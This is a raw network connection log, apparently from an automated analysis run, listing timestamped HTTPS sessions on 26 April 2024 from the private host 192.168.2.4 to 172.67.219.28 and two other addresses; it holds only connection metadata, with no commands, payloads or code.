Apr 26, 2024 23:20:16.139606953 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.274113894 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.274400949 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.279346943 CEST	49783	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.279952049 CEST	49783	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.279967070 CEST	443	49783	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.381274939 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.381300926 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.387370110 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.390310049 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.390322924 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.657002926 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.657074928 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.657572985 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.657581091 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:20.659013987 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:20.659019947 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.639707088 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.639837980 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.639848948 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.640006065 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.640094042 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.640333891 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.640373945 CEST	49784	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.640389919 CEST	443	49784	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.697616100 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.697702885 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.697948933 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.699634075 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.699670076 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.964467049 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.964574099 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.964941025 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.964965105 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:25.969307899 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:25.969322920 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.417188883 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.417347908 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.417485952 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.417752981 CEST	49785	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.417778015 CEST	443	49785	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.484946012 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.485032082 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.485387087 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.491292953 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.491329908 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.751205921 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.751272917 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.752095938 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.752131939 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:30.753698111 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:30.753711939 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:34.918704033 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:34.918775082 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.918813944 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:34.918862104 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.918876886 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:34.918896914 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:34.918926954 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.918955088 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.919014931 CEST	49786	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.919039011 CEST	443	49786	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:34.977493048 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.977591991 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:34.977670908 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.977925062 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:34.977965117 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:35.240181923 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:35.240232944 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:35.240570068 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:35.240581989 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:35.242398024 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:35.242405891 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:38.843322992 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:38.843375921 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:38.843401909 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:38.843427896 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:38.843446970 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:38.843461037 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:38.843616009 CEST	49787	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:38.843632936 CEST	443	49787	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:38.919848919 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:38.919887066 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:38.919961929 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:38.920207977 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:38.920221090 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:39.184767008 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:39.184933901 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:39.185290098 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:39.185302019 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:39.186911106 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:39.186928034 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.497607946 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.497709036 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.497737885 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.497798920 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.497980118 CEST	49788	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.498013020 CEST	443	49788	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.571290970 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.571316957 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.575400114 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.579293966 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.579307079 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.841847897 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.847326040 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.847753048 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.847758055 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:43.850327969 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:43.850333929 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.022474051 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.022578955 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.022664070 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.022866011 CEST	49789	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.022886992 CEST	443	49789	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.109312057 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.109345913 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.109594107 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.109802961 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.109816074 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.373683929 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.377594948 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.378993988 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.378993988 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:48.379009962 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:48.379031897 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:55.969836950 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:55.969949961 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:55.970132113 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:55.970591068 CEST	49790	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:55.970607042 CEST	443	49790	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:56.131325960 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:56.131439924 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:56.131685019 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:56.132040977 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:56.132072926 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:56.391427994 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:56.395382881 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:56.396842003 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:56.396842003 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:20:56.396868944 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:20:56.396914005 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:00.967670918 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:00.967745066 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:00.967803001 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:00.967859030 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:00.967875004 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:00.967919111 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:00.967936993 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:00.967995882 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:00.968034983 CEST	49791	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:00.968064070 CEST	443	49791	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:01.049400091 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:01.049426079 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:01.049518108 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:01.049879074 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:01.049892902 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:01.316066980 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:01.316143036 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:01.316592932 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:01.316597939 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:01.317816019 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:01.317821980 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:04.755951881 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:04.756025076 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:04.756047964 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:04.756120920 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:04.756124020 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:04.756195068 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:04.756345034 CEST	49792	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:04.756357908 CEST	443	49792	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:04.906939030 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:04.907012939 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:04.907092094 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:04.907371998 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:04.907401085 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:05.169078112 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:05.169150114 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:05.169621944 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:05.169642925 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:05.171149969 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:05.171164036 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.111118078 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.111289024 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.111371994 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.111409903 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.111608028 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.111661911 CEST	49793	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.111695051 CEST	443	49793	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.189824104 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.189876080 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.189970970 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.190213919 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.190231085 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.458058119 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.461435080 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.462996960 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.462996960 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:10.463006973 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:10.463025093 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:15.617224932 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:15.617427111 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:15.617451906 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:15.617501020 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:15.617537022 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:15.617598057 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:15.617604017 CEST	443	49794	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:15.617697001 CEST	49794	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:15.809401989 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:15.809477091 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:15.815443039 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:15.818339109 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:15.818372011 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:16.084256887 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:16.084341049 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:16.084734917 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:16.084753990 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:16.088834047 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:16.088848114 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.242368937 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.242641926 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.242784023 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.243009090 CEST	49795	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.243026018 CEST	443	49795	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.342722893 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.342838049 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.343041897 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.343422890 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.343461037 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.611418009 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.613662004 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.615495920 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.615495920 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:20.615523100 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:20.615561008 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:23.821150064 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:23.821238995 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:23.821373940 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:23.823193073 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:23.823227882 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.487688065 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.487854004 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.501405001 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.501451969 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.502495050 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.505568981 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.505877972 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.505877972 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.505949974 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.704355001 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.704433918 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.731267929 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:24.731354952 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.731421947 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:24.731482983 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.731503010 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:24.731554031 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:24.731564045 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.731610060 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.731652975 CEST	49796	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.731679916 CEST	443	49796	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:24.864876032 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.864928007 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:24.864995003 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.865258932 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:24.865274906 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:24.869811058 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.869893074 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.869932890 CEST	443	49797	20.189.173.10	192.168.2.4
Apr 26, 2024 23:21:24.869935036 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:24.869983912 CEST	49797	443	192.168.2.4	20.189.173.10
Apr 26, 2024 23:21:25.132006884 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:25.132075071 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:25.132527113 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:25.132539988 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:25.133968115 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:25.133974075 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:30.911763906 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:30.911830902 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.911849022 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:30.911890030 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.911967993 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:30.912050009 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.912055016 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:30.912102938 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.912132025 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:30.912205935 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.912205935 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.992273092 CEST	49799	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.992320061 CEST	443	49799	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:30.992384911 CEST	49799	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.992621899 CEST	49799	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:30.992633104 CEST	443	49799	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:31.219346046 CEST	49798	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:31.219389915 CEST	443	49798	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:31.257898092 CEST	443	49799	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:31.257958889 CEST	49799	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:31.258366108 CEST	49799	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:31.258373976 CEST	443	49799	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:31.259996891 CEST	49799	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:31.260003090 CEST	443	49799	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:35.266756058 CEST	49799	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:35.501813889 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:35.501895905 CEST	443	49800	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:35.501977921 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:35.502289057 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:35.502326965 CEST	443	49800	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:35.768956900 CEST	443	49800	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:35.769134045 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:35.771836042 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:35.771842957 CEST	443	49800	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:35.772044897 CEST	443	49800	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:35.775422096 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:35.779393911 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:35.824115038 CEST	443	49800	172.67.197.34	192.168.2.4
Apr 26, 2024 23:21:39.784538031 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:39.784548044 CEST	49800	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:21:39.784578085 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:39.785526037 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:39.789339066 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:39.789350033 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:40.047365904 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:40.049432993 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:40.050884008 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:40.050884008 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:40.050890923 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:40.050901890 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.584943056 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.585047960 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.585083008 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.585093021 CEST	443	49801	172.67.219.28	192.168.2.4
Apr 26, 2024 23:21:43.585134983 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.585278034 CEST	49801	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:21:43.585294962 CEST	443	49801	172.67.219.28	192.168.2.4
